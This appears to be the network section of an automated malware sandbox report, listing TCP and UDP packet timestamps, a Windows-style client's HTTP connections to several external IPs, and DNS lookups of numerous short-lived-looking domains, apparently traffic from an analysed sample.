Sep 5, 2024 09:06:29.738713980 CEST	49178	80	192.168.2.22	63.250.47.40
Sep 5, 2024 09:06:29.744931936 CEST	80	49178	63.250.47.40	192.168.2.22
Sep 5, 2024 09:06:29.745002985 CEST	49178	80	192.168.2.22	63.250.47.40
Sep 5, 2024 09:06:29.757404089 CEST	49178	80	192.168.2.22	63.250.47.40
Sep 5, 2024 09:06:29.764969110 CEST	80	49178	63.250.47.40	192.168.2.22
Sep 5, 2024 09:06:29.765023947 CEST	49178	80	192.168.2.22	63.250.47.40
Sep 5, 2024 09:06:29.765049934 CEST	80	49178	63.250.47.40	192.168.2.22
Sep 5, 2024 09:06:29.770016909 CEST	80	49178	63.250.47.40	192.168.2.22
Sep 5, 2024 09:06:29.770062923 CEST	80	49178	63.250.47.40	192.168.2.22
Sep 5, 2024 09:06:30.414475918 CEST	80	49178	63.250.47.40	192.168.2.22
Sep 5, 2024 09:06:30.414522886 CEST	80	49178	63.250.47.40	192.168.2.22
Sep 5, 2024 09:06:30.414607048 CEST	49178	80	192.168.2.22	63.250.47.40
Sep 5, 2024 09:06:31.264291048 CEST	49178	80	192.168.2.22	63.250.47.40
Sep 5, 2024 09:06:32.283519983 CEST	49179	80	192.168.2.22	63.250.47.40
Sep 5, 2024 09:06:32.288315058 CEST	80	49179	63.250.47.40	192.168.2.22
Sep 5, 2024 09:06:32.288427114 CEST	49179	80	192.168.2.22	63.250.47.40
Sep 5, 2024 09:06:32.295969963 CEST	49179	80	192.168.2.22	63.250.47.40
Sep 5, 2024 09:06:32.300734997 CEST	80	49179	63.250.47.40	192.168.2.22
Sep 5, 2024 09:06:32.877831936 CEST	80	49179	63.250.47.40	192.168.2.22
Sep 5, 2024 09:06:32.878210068 CEST	80	49179	63.250.47.40	192.168.2.22
Sep 5, 2024 09:06:32.878402948 CEST	49179	80	192.168.2.22	63.250.47.40
Sep 5, 2024 09:06:32.883510113 CEST	49179	80	192.168.2.22	63.250.47.40
Sep 5, 2024 09:06:32.888290882 CEST	80	49179	63.250.47.40	192.168.2.22
Sep 5, 2024 09:06:37.946624041 CEST	49180	80	192.168.2.22	91.184.0.200
Sep 5, 2024 09:06:37.951641083 CEST	80	49180	91.184.0.200	192.168.2.22
Sep 5, 2024 09:06:37.951699972 CEST	49180	80	192.168.2.22	91.184.0.200
Sep 5, 2024 09:06:37.963625908 CEST	49180	80	192.168.2.22	91.184.0.200
Sep 5, 2024 09:06:37.968499899 CEST	80	49180	91.184.0.200	192.168.2.22
Sep 5, 2024 09:06:37.968544006 CEST	49180	80	192.168.2.22	91.184.0.200
Sep 5, 2024 09:06:37.968571901 CEST	80	49180	91.184.0.200	192.168.2.22
Sep 5, 2024 09:06:37.973321915 CEST	80	49180	91.184.0.200	192.168.2.22
Sep 5, 2024 09:06:38.575887918 CEST	80	49180	91.184.0.200	192.168.2.22
Sep 5, 2024 09:06:38.575937986 CEST	80	49180	91.184.0.200	192.168.2.22
Sep 5, 2024 09:06:38.576047897 CEST	49180	80	192.168.2.22	91.184.0.200
Sep 5, 2024 09:06:39.469902039 CEST	49180	80	192.168.2.22	91.184.0.200
Sep 5, 2024 09:06:40.487529039 CEST	49181	80	192.168.2.22	91.184.0.200
Sep 5, 2024 09:06:40.492486000 CEST	80	49181	91.184.0.200	192.168.2.22
Sep 5, 2024 09:06:40.495533943 CEST	49181	80	192.168.2.22	91.184.0.200
Sep 5, 2024 09:06:40.504463911 CEST	49181	80	192.168.2.22	91.184.0.200
Sep 5, 2024 09:06:40.509558916 CEST	80	49181	91.184.0.200	192.168.2.22
Sep 5, 2024 09:06:40.509748936 CEST	80	49181	91.184.0.200	192.168.2.22
Sep 5, 2024 09:06:40.509785891 CEST	49181	80	192.168.2.22	91.184.0.200
Sep 5, 2024 09:06:40.514568090 CEST	80	49181	91.184.0.200	192.168.2.22
Sep 5, 2024 09:06:40.514686108 CEST	80	49181	91.184.0.200	192.168.2.22
Sep 5, 2024 09:06:41.114365101 CEST	80	49181	91.184.0.200	192.168.2.22
Sep 5, 2024 09:06:41.114478111 CEST	80	49181	91.184.0.200	192.168.2.22
Sep 5, 2024 09:06:41.121687889 CEST	49181	80	192.168.2.22	91.184.0.200
Sep 5, 2024 09:06:42.012768030 CEST	49181	80	192.168.2.22	91.184.0.200
Sep 5, 2024 09:06:43.030078888 CEST	49182	80	192.168.2.22	91.184.0.200
Sep 5, 2024 09:06:43.034980059 CEST	80	49182	91.184.0.200	192.168.2.22
Sep 5, 2024 09:06:43.035604954 CEST	49182	80	192.168.2.22	91.184.0.200
Sep 5, 2024 09:06:43.042484045 CEST	49182	80	192.168.2.22	91.184.0.200
Sep 5, 2024 09:06:43.050019026 CEST	80	49182	91.184.0.200	192.168.2.22
Sep 5, 2024 09:06:43.664164066 CEST	80	49182	91.184.0.200	192.168.2.22
Sep 5, 2024 09:06:43.664208889 CEST	80	49182	91.184.0.200	192.168.2.22
Sep 5, 2024 09:06:43.664334059 CEST	49182	80	192.168.2.22	91.184.0.200
Sep 5, 2024 09:06:43.667124033 CEST	49182	80	192.168.2.22	91.184.0.200
Sep 5, 2024 09:06:43.671880960 CEST	80	49182	91.184.0.200	192.168.2.22
Sep 5, 2024 09:06:48.734546900 CEST	49183	80	192.168.2.22	13.248.169.48
Sep 5, 2024 09:06:48.739505053 CEST	80	49183	13.248.169.48	192.168.2.22
Sep 5, 2024 09:06:48.743530035 CEST	49183	80	192.168.2.22	13.248.169.48
Sep 5, 2024 09:06:48.751543045 CEST	49183	80	192.168.2.22	13.248.169.48
Sep 5, 2024 09:06:48.756705999 CEST	80	49183	13.248.169.48	192.168.2.22
Sep 5, 2024 09:06:48.756890059 CEST	49183	80	192.168.2.22	13.248.169.48
Sep 5, 2024 09:06:48.756928921 CEST	80	49183	13.248.169.48	192.168.2.22
Sep 5, 2024 09:06:48.761807919 CEST	80	49183	13.248.169.48	192.168.2.22
Sep 5, 2024 09:06:49.222995996 CEST	80	49183	13.248.169.48	192.168.2.22
Sep 5, 2024 09:06:49.223169088 CEST	49183	80	192.168.2.22	13.248.169.48
Sep 5, 2024 09:06:50.265125036 CEST	49183	80	192.168.2.22	13.248.169.48
Sep 5, 2024 09:06:50.270088911 CEST	80	49183	13.248.169.48	192.168.2.22
Sep 5, 2024 09:06:51.285012007 CEST	49184	80	192.168.2.22	13.248.169.48
Sep 5, 2024 09:06:51.289989948 CEST	80	49184	13.248.169.48	192.168.2.22
Sep 5, 2024 09:06:51.290051937 CEST	49184	80	192.168.2.22	13.248.169.48
Sep 5, 2024 09:06:51.301711082 CEST	49184	80	192.168.2.22	13.248.169.48
Sep 5, 2024 09:06:51.306653976 CEST	80	49184	13.248.169.48	192.168.2.22
Sep 5, 2024 09:06:51.306705952 CEST	49184	80	192.168.2.22	13.248.169.48
Sep 5, 2024 09:06:51.306726933 CEST	80	49184	13.248.169.48	192.168.2.22
Sep 5, 2024 09:06:51.311654091 CEST	80	49184	13.248.169.48	192.168.2.22
Sep 5, 2024 09:06:51.311712027 CEST	80	49184	13.248.169.48	192.168.2.22
Sep 5, 2024 09:06:51.749214888 CEST	80	49184	13.248.169.48	192.168.2.22
Sep 5, 2024 09:06:51.749270916 CEST	49184	80	192.168.2.22	13.248.169.48
Sep 5, 2024 09:06:52.810089111 CEST	49184	80	192.168.2.22	13.248.169.48
Sep 5, 2024 09:06:52.815012932 CEST	80	49184	13.248.169.48	192.168.2.22
Sep 5, 2024 09:06:53.848473072 CEST	49185	80	192.168.2.22	13.248.169.48
Sep 5, 2024 09:06:53.853343964 CEST	80	49185	13.248.169.48	192.168.2.22
Sep 5, 2024 09:06:53.853413105 CEST	49185	80	192.168.2.22	13.248.169.48
Sep 5, 2024 09:06:53.868098974 CEST	49185	80	192.168.2.22	13.248.169.48
Sep 5, 2024 09:06:53.872925043 CEST	80	49185	13.248.169.48	192.168.2.22
Sep 5, 2024 09:06:54.314297915 CEST	80	49185	13.248.169.48	192.168.2.22
Sep 5, 2024 09:06:54.314462900 CEST	80	49185	13.248.169.48	192.168.2.22
Sep 5, 2024 09:06:54.315526009 CEST	49185	80	192.168.2.22	13.248.169.48
Sep 5, 2024 09:06:54.317243099 CEST	49185	80	192.168.2.22	13.248.169.48
Sep 5, 2024 09:06:54.323036909 CEST	80	49185	13.248.169.48	192.168.2.22
Sep 5, 2024 09:07:10.581171989 CEST	49189	80	192.168.2.22	43.242.202.169
Sep 5, 2024 09:07:10.585968971 CEST	80	49189	43.242.202.169	192.168.2.22
Sep 5, 2024 09:07:10.587527990 CEST	49189	80	192.168.2.22	43.242.202.169
Sep 5, 2024 09:07:10.598164082 CEST	49189	80	192.168.2.22	43.242.202.169
Sep 5, 2024 09:07:10.603034019 CEST	80	49189	43.242.202.169	192.168.2.22
Sep 5, 2024 09:07:10.603121996 CEST	80	49189	43.242.202.169	192.168.2.22
Sep 5, 2024 09:07:10.603208065 CEST	49189	80	192.168.2.22	43.242.202.169
Sep 5, 2024 09:07:10.608268023 CEST	80	49189	43.242.202.169	192.168.2.22
Sep 5, 2024 09:07:11.485670090 CEST	80	49189	43.242.202.169	192.168.2.22
Sep 5, 2024 09:07:11.485685110 CEST	80	49189	43.242.202.169	192.168.2.22
Sep 5, 2024 09:07:11.485765934 CEST	49189	80	192.168.2.22	43.242.202.169
Sep 5, 2024 09:07:12.105441093 CEST	49189	80	192.168.2.22	43.242.202.169
Sep 5, 2024 09:07:13.124963045 CEST	49190	80	192.168.2.22	43.242.202.169
Sep 5, 2024 09:07:13.129791021 CEST	80	49190	43.242.202.169	192.168.2.22
Sep 5, 2024 09:07:13.131547928 CEST	49190	80	192.168.2.22	43.242.202.169
Sep 5, 2024 09:07:13.142992973 CEST	49190	80	192.168.2.22	43.242.202.169
Sep 5, 2024 09:07:13.147886038 CEST	80	49190	43.242.202.169	192.168.2.22
Sep 5, 2024 09:07:13.147980928 CEST	80	49190	43.242.202.169	192.168.2.22
Sep 5, 2024 09:07:13.148035049 CEST	49190	80	192.168.2.22	43.242.202.169
Sep 5, 2024 09:07:13.152987003 CEST	80	49190	43.242.202.169	192.168.2.22
Sep 5, 2024 09:07:13.153000116 CEST	80	49190	43.242.202.169	192.168.2.22
Sep 5, 2024 09:07:14.286190987 CEST	80	49190	43.242.202.169	192.168.2.22
Sep 5, 2024 09:07:14.286204100 CEST	80	49190	43.242.202.169	192.168.2.22
Sep 5, 2024 09:07:14.286250114 CEST	49190	80	192.168.2.22	43.242.202.169
Sep 5, 2024 09:07:14.293956041 CEST	80	49190	43.242.202.169	192.168.2.22
Sep 5, 2024 09:07:14.293992996 CEST	49190	80	192.168.2.22	43.242.202.169
Sep 5, 2024 09:07:14.647957087 CEST	49190	80	192.168.2.22	43.242.202.169
Sep 5, 2024 09:07:15.667000055 CEST	49191	80	192.168.2.22	43.242.202.169
Sep 5, 2024 09:07:15.671871901 CEST	80	49191	43.242.202.169	192.168.2.22
Sep 5, 2024 09:07:15.671936989 CEST	49191	80	192.168.2.22	43.242.202.169
Sep 5, 2024 09:07:15.683706999 CEST	49191	80	192.168.2.22	43.242.202.169
Sep 5, 2024 09:07:15.688513994 CEST	80	49191	43.242.202.169	192.168.2.22
Sep 5, 2024 09:07:16.542857885 CEST	80	49191	43.242.202.169	192.168.2.22
Sep 5, 2024 09:07:16.543370008 CEST	80	49191	43.242.202.169	192.168.2.22
Sep 5, 2024 09:07:16.545703888 CEST	49191	80	192.168.2.22	43.242.202.169
Sep 5, 2024 09:07:16.548738003 CEST	49191	80	192.168.2.22	43.242.202.169
Sep 5, 2024 09:07:16.553554058 CEST	80	49191	43.242.202.169	192.168.2.22
Sep 5, 2024 09:07:27.780208111 CEST	49192	80	192.168.2.22	103.224.182.242
Sep 5, 2024 09:07:27.785156965 CEST	80	49192	103.224.182.242	192.168.2.22
Sep 5, 2024 09:07:27.785223007 CEST	49192	80	192.168.2.22	103.224.182.242
Sep 5, 2024 09:07:27.807743073 CEST	49192	80	192.168.2.22	103.224.182.242
Sep 5, 2024 09:07:27.812707901 CEST	80	49192	103.224.182.242	192.168.2.22
Sep 5, 2024 09:07:27.812750101 CEST	49192	80	192.168.2.22	103.224.182.242
Sep 5, 2024 09:07:27.812762022 CEST	80	49192	103.224.182.242	192.168.2.22
Sep 5, 2024 09:07:27.817706108 CEST	80	49192	103.224.182.242	192.168.2.22
Sep 5, 2024 09:07:28.391710043 CEST	80	49192	103.224.182.242	192.168.2.22
Sep 5, 2024 09:07:28.391729116 CEST	80	49192	103.224.182.242	192.168.2.22
Sep 5, 2024 09:07:28.391834021 CEST	49192	80	192.168.2.22	103.224.182.242
Sep 5, 2024 09:07:29.312030077 CEST	49192	80	192.168.2.22	103.224.182.242
Sep 5, 2024 09:07:30.329345942 CEST	49193	80	192.168.2.22	103.224.182.242
Sep 5, 2024 09:07:30.334233999 CEST	80	49193	103.224.182.242	192.168.2.22
Sep 5, 2024 09:07:30.334290981 CEST	49193	80	192.168.2.22	103.224.182.242
Sep 5, 2024 09:07:30.347544909 CEST	49193	80	192.168.2.22	103.224.182.242
Sep 5, 2024 09:07:30.352376938 CEST	80	49193	103.224.182.242	192.168.2.22
Sep 5, 2024 09:07:30.352543116 CEST	80	49193	103.224.182.242	192.168.2.22
Sep 5, 2024 09:07:30.359586000 CEST	49193	80	192.168.2.22	103.224.182.242
Sep 5, 2024 09:07:30.364372015 CEST	80	49193	103.224.182.242	192.168.2.22
Sep 5, 2024 09:07:30.364602089 CEST	80	49193	103.224.182.242	192.168.2.22
Sep 5, 2024 09:07:31.022140026 CEST	80	49193	103.224.182.242	192.168.2.22
Sep 5, 2024 09:07:31.022164106 CEST	80	49193	103.224.182.242	192.168.2.22
Sep 5, 2024 09:07:31.022300959 CEST	49193	80	192.168.2.22	103.224.182.242
Sep 5, 2024 09:07:31.855336905 CEST	49193	80	192.168.2.22	103.224.182.242
Sep 5, 2024 09:07:32.747522116 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:07:32.752686024 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:07:32.757953882 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:07:32.872134924 CEST	49194	80	192.168.2.22	103.224.182.242
Sep 5, 2024 09:07:32.877115965 CEST	80	49194	103.224.182.242	192.168.2.22
Sep 5, 2024 09:07:32.877630949 CEST	49194	80	192.168.2.22	103.224.182.242
Sep 5, 2024 09:07:32.885814905 CEST	49194	80	192.168.2.22	103.224.182.242
Sep 5, 2024 09:07:32.890717030 CEST	80	49194	103.224.182.242	192.168.2.22
Sep 5, 2024 09:07:33.552184105 CEST	80	49194	103.224.182.242	192.168.2.22
Sep 5, 2024 09:07:33.552299023 CEST	80	49194	103.224.182.242	192.168.2.22
Sep 5, 2024 09:07:33.552310944 CEST	80	49194	103.224.182.242	192.168.2.22
Sep 5, 2024 09:07:33.552397966 CEST	49194	80	192.168.2.22	103.224.182.242
Sep 5, 2024 09:07:33.552407980 CEST	80	49194	103.224.182.242	192.168.2.22
Sep 5, 2024 09:07:33.552447081 CEST	49194	80	192.168.2.22	103.224.182.242
Sep 5, 2024 09:07:33.558161974 CEST	49194	80	192.168.2.22	103.224.182.242
Sep 5, 2024 09:07:33.563385010 CEST	80	49194	103.224.182.242	192.168.2.22
Sep 5, 2024 09:07:38.697717905 CEST	49195	80	192.168.2.22	85.159.66.93
Sep 5, 2024 09:07:38.702490091 CEST	80	49195	85.159.66.93	192.168.2.22
Sep 5, 2024 09:07:38.705624104 CEST	49195	80	192.168.2.22	85.159.66.93
Sep 5, 2024 09:07:38.717580080 CEST	49195	80	192.168.2.22	85.159.66.93
Sep 5, 2024 09:07:38.722372055 CEST	80	49195	85.159.66.93	192.168.2.22
Sep 5, 2024 09:07:38.722486973 CEST	80	49195	85.159.66.93	192.168.2.22
Sep 5, 2024 09:07:38.722588062 CEST	49195	80	192.168.2.22	85.159.66.93
Sep 5, 2024 09:07:38.727355957 CEST	80	49195	85.159.66.93	192.168.2.22
Sep 5, 2024 09:07:39.404082060 CEST	80	49195	85.159.66.93	192.168.2.22
Sep 5, 2024 09:07:39.404155970 CEST	80	49195	85.159.66.93	192.168.2.22
Sep 5, 2024 09:07:39.404200077 CEST	49195	80	192.168.2.22	85.159.66.93
Sep 5, 2024 09:07:40.216428041 CEST	49195	80	192.168.2.22	85.159.66.93
Sep 5, 2024 09:07:41.253539085 CEST	49196	80	192.168.2.22	85.159.66.93
Sep 5, 2024 09:07:41.258516073 CEST	80	49196	85.159.66.93	192.168.2.22
Sep 5, 2024 09:07:41.258642912 CEST	49196	80	192.168.2.22	85.159.66.93
Sep 5, 2024 09:07:41.271306992 CEST	49196	80	192.168.2.22	85.159.66.93
Sep 5, 2024 09:07:41.276191950 CEST	80	49196	85.159.66.93	192.168.2.22
Sep 5, 2024 09:07:41.276314974 CEST	49196	80	192.168.2.22	85.159.66.93
Sep 5, 2024 09:07:41.276336908 CEST	80	49196	85.159.66.93	192.168.2.22
Sep 5, 2024 09:07:41.281150103 CEST	80	49196	85.159.66.93	192.168.2.22
Sep 5, 2024 09:07:41.281280994 CEST	80	49196	85.159.66.93	192.168.2.22
Sep 5, 2024 09:07:41.952198982 CEST	80	49196	85.159.66.93	192.168.2.22
Sep 5, 2024 09:07:41.952306032 CEST	80	49196	85.159.66.93	192.168.2.22
Sep 5, 2024 09:07:41.952356100 CEST	49196	80	192.168.2.22	85.159.66.93
Sep 5, 2024 09:07:42.781661987 CEST	49196	80	192.168.2.22	85.159.66.93
Sep 5, 2024 09:07:43.792207003 CEST	49197	80	192.168.2.22	85.159.66.93
Sep 5, 2024 09:07:43.797271967 CEST	80	49197	85.159.66.93	192.168.2.22
Sep 5, 2024 09:07:43.797344923 CEST	49197	80	192.168.2.22	85.159.66.93
Sep 5, 2024 09:07:43.804586887 CEST	49197	80	192.168.2.22	85.159.66.93
Sep 5, 2024 09:07:43.809421062 CEST	80	49197	85.159.66.93	192.168.2.22
Sep 5, 2024 09:07:44.480700016 CEST	80	49197	85.159.66.93	192.168.2.22
Sep 5, 2024 09:07:44.480720043 CEST	80	49197	85.159.66.93	192.168.2.22
Sep 5, 2024 09:07:44.480896950 CEST	49197	80	192.168.2.22	85.159.66.93
Sep 5, 2024 09:07:44.483737946 CEST	49197	80	192.168.2.22	85.159.66.93
Sep 5, 2024 09:07:44.488503933 CEST	80	49197	85.159.66.93	192.168.2.22
Sep 5, 2024 09:07:49.776479006 CEST	49198	80	192.168.2.22	188.114.96.3
Sep 5, 2024 09:07:49.781946898 CEST	80	49198	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:49.791551113 CEST	49198	80	192.168.2.22	188.114.96.3
Sep 5, 2024 09:07:49.799566031 CEST	49198	80	192.168.2.22	188.114.96.3
Sep 5, 2024 09:07:49.804785013 CEST	80	49198	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:49.804791927 CEST	80	49198	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:49.807610989 CEST	49198	80	192.168.2.22	188.114.96.3
Sep 5, 2024 09:07:49.812401056 CEST	80	49198	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:51.160207987 CEST	80	49198	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:51.160221100 CEST	80	49198	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:51.160233974 CEST	80	49198	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:51.160247087 CEST	80	49198	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:51.160259008 CEST	80	49198	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:51.160281897 CEST	49198	80	192.168.2.22	188.114.96.3
Sep 5, 2024 09:07:51.160281897 CEST	49198	80	192.168.2.22	188.114.96.3
Sep 5, 2024 09:07:51.160295963 CEST	49198	80	192.168.2.22	188.114.96.3
Sep 5, 2024 09:07:51.160310984 CEST	80	49198	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:51.160331964 CEST	49198	80	192.168.2.22	188.114.96.3
Sep 5, 2024 09:07:51.160516024 CEST	80	49198	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:51.160556078 CEST	49198	80	192.168.2.22	188.114.96.3
Sep 5, 2024 09:07:51.308029890 CEST	49198	80	192.168.2.22	188.114.96.3
Sep 5, 2024 09:07:52.562719107 CEST	49199	80	192.168.2.22	188.114.96.3
Sep 5, 2024 09:07:52.567670107 CEST	80	49199	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:52.567745924 CEST	49199	80	192.168.2.22	188.114.96.3
Sep 5, 2024 09:07:52.579880953 CEST	49199	80	192.168.2.22	188.114.96.3
Sep 5, 2024 09:07:52.584702015 CEST	80	49199	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:52.584836960 CEST	80	49199	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:52.584880114 CEST	49199	80	192.168.2.22	188.114.96.3
Sep 5, 2024 09:07:52.589651108 CEST	80	49199	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:52.589808941 CEST	80	49199	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:53.588018894 CEST	80	49199	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:53.588042021 CEST	80	49199	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:53.588059902 CEST	80	49199	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:53.588074923 CEST	80	49199	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:53.588108063 CEST	49199	80	192.168.2.22	188.114.96.3
Sep 5, 2024 09:07:53.588157892 CEST	49199	80	192.168.2.22	188.114.96.3
Sep 5, 2024 09:07:54.084845066 CEST	49199	80	192.168.2.22	188.114.96.3
Sep 5, 2024 09:07:55.105608940 CEST	49200	80	192.168.2.22	188.114.96.3
Sep 5, 2024 09:07:55.110527992 CEST	80	49200	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:55.110640049 CEST	49200	80	192.168.2.22	188.114.96.3
Sep 5, 2024 09:07:55.118305922 CEST	49200	80	192.168.2.22	188.114.96.3
Sep 5, 2024 09:07:55.123131037 CEST	80	49200	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:56.091516972 CEST	80	49200	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:56.091550112 CEST	80	49200	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:56.091564894 CEST	80	49200	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:56.091588974 CEST	80	49200	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:56.091603994 CEST	80	49200	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:56.091620922 CEST	80	49200	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:56.091635942 CEST	80	49200	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:56.091651917 CEST	80	49200	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:56.091734886 CEST	49200	80	192.168.2.22	188.114.96.3
Sep 5, 2024 09:07:56.091734886 CEST	49200	80	192.168.2.22	188.114.96.3
Sep 5, 2024 09:07:56.092539072 CEST	80	49200	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:56.092619896 CEST	80	49200	188.114.96.3	192.168.2.22
Sep 5, 2024 09:07:56.096420050 CEST	49200	80	192.168.2.22	188.114.96.3
Sep 5, 2024 09:07:56.096420050 CEST	49200	80	192.168.2.22	188.114.96.3
Sep 5, 2024 09:07:56.101702929 CEST	80	49200	188.114.96.3	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 5, 2024 09:05:17.156023026 CEST	54562	53	192.168.2.22	8.8.8.8
Sep 5, 2024 09:05:17.183043957 CEST	53	54562	8.8.8.8	192.168.2.22
Sep 5, 2024 09:05:22.194430113 CEST	52917	53	192.168.2.22	8.8.8.8
Sep 5, 2024 09:05:22.203994989 CEST	53	52917	8.8.8.8	192.168.2.22
Sep 5, 2024 09:05:27.221647978 CEST	62751	53	192.168.2.22	8.8.8.8
Sep 5, 2024 09:05:27.358809948 CEST	53	62751	8.8.8.8	192.168.2.22
Sep 5, 2024 09:05:32.759639025 CEST	57893	53	192.168.2.22	8.8.8.8
Sep 5, 2024 09:05:32.768199921 CEST	53	57893	8.8.8.8	192.168.2.22
Sep 5, 2024 09:05:42.943840027 CEST	54821	53	192.168.2.22	8.8.8.8
Sep 5, 2024 09:05:42.963404894 CEST	53	54821	8.8.8.8	192.168.2.22
Sep 5, 2024 09:05:53.532991886 CEST	54719	53	192.168.2.22	8.8.8.8
Sep 5, 2024 09:05:53.858009100 CEST	53	54719	8.8.8.8	192.168.2.22
Sep 5, 2024 09:06:04.478637934 CEST	49881	53	192.168.2.22	8.8.8.8
Sep 5, 2024 09:06:04.496222019 CEST	53	49881	8.8.8.8	192.168.2.22
Sep 5, 2024 09:06:16.277719975 CEST	54998	53	192.168.2.22	8.8.8.8
Sep 5, 2024 09:06:16.318288088 CEST	53	54998	8.8.8.8	192.168.2.22
Sep 5, 2024 09:06:27.069963932 CEST	52781	53	192.168.2.22	8.8.8.8
Sep 5, 2024 09:06:27.189970016 CEST	53	52781	8.8.8.8	192.168.2.22
Sep 5, 2024 09:06:37.885804892 CEST	63926	53	192.168.2.22	8.8.8.8
Sep 5, 2024 09:06:37.944360971 CEST	53	63926	8.8.8.8	192.168.2.22
Sep 5, 2024 09:06:48.683537006 CEST	65510	53	192.168.2.22	8.8.8.8
Sep 5, 2024 09:06:48.732243061 CEST	53	65510	8.8.8.8	192.168.2.22
Sep 5, 2024 09:06:59.450141907 CEST	62672	53	192.168.2.22	8.8.8.8
Sep 5, 2024 09:07:10.260149002 CEST	56475	53	192.168.2.22	8.8.8.8
Sep 5, 2024 09:07:10.578748941 CEST	53	56475	8.8.8.8	192.168.2.22
Sep 5, 2024 09:07:26.560221910 CEST	49384	53	192.168.2.22	8.8.8.8
Sep 5, 2024 09:07:27.450927973 CEST	53	49384	8.8.8.8	192.168.2.22
Sep 5, 2024 09:07:38.568308115 CEST	58095	53	192.168.2.22	8.8.8.8
Sep 5, 2024 09:07:38.689306021 CEST	53	58095	8.8.8.8	192.168.2.22
Sep 5, 2024 09:07:49.679991007 CEST	50446	53	192.168.2.22	8.8.8.8
Sep 5, 2024 09:07:49.771651983 CEST	53	50446	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 5, 2024 09:05:17.156023026 CEST	192.168.2.22	8.8.8.8	0xe8dc	Standard query (0)	www.woshop.online	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:05:22.194430113 CEST	192.168.2.22	8.8.8.8	0xfc25	Standard query (0)	www.kxshopmr.store	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:05:27.221647978 CEST	192.168.2.22	8.8.8.8	0xf93c	Standard query (0)	www.elsupertodo.net	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:05:32.759639025 CEST	192.168.2.22	8.8.8.8	0xd0a5	Standard query (0)	www.sqlite.org	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:05:42.943840027 CEST	192.168.2.22	8.8.8.8	0x4137	Standard query (0)	www.omexai.info	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:05:53.532991886 CEST	192.168.2.22	8.8.8.8	0x22db	Standard query (0)	www.tekilla.wtf	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:06:04.478637934 CEST	192.168.2.22	8.8.8.8	0xade4	Standard query (0)	www.bola88site.one	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:06:16.277719975 CEST	192.168.2.22	8.8.8.8	0x2322	Standard query (0)	www.languagemodel.pro	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:06:27.069963932 CEST	192.168.2.22	8.8.8.8	0x371	Standard query (0)	www.kexweb.top	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:06:37.885804892 CEST	192.168.2.22	8.8.8.8	0xd0c0	Standard query (0)	www.jobworklanka.online	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:06:48.683537006 CEST	192.168.2.22	8.8.8.8	0xa6f7	Standard query (0)	www.dyme.tech	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:06:59.450141907 CEST	192.168.2.22	8.8.8.8	0xffc3	Standard query (0)	www.arlon-commerce.com	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:07:10.260149002 CEST	192.168.2.22	8.8.8.8	0x3db0	Standard query (0)	www.mizuquan.top	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:07:26.560221910 CEST	192.168.2.22	8.8.8.8	0x2ca3	Standard query (0)	www.nobartv6.website	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:07:38.568308115 CEST	192.168.2.22	8.8.8.8	0xa670	Standard query (0)	www.sailnway.net	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:07:49.679991007 CEST	192.168.2.22	8.8.8.8	0x183a	Standard query (0)	www.chinaen.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 5, 2024 09:05:17.183043957 CEST	8.8.8.8	192.168.2.22	0xe8dc	Name error (3)	www.woshop.online	none	none	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:05:22.203994989 CEST	8.8.8.8	192.168.2.22	0xfc25	Name error (3)	www.kxshopmr.store	none	none	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:05:27.358809948 CEST	8.8.8.8	192.168.2.22	0xf93c	No error (0)	www.elsupertodo.net		148.72.152.174	A (IP address)	IN (0x0001)	false
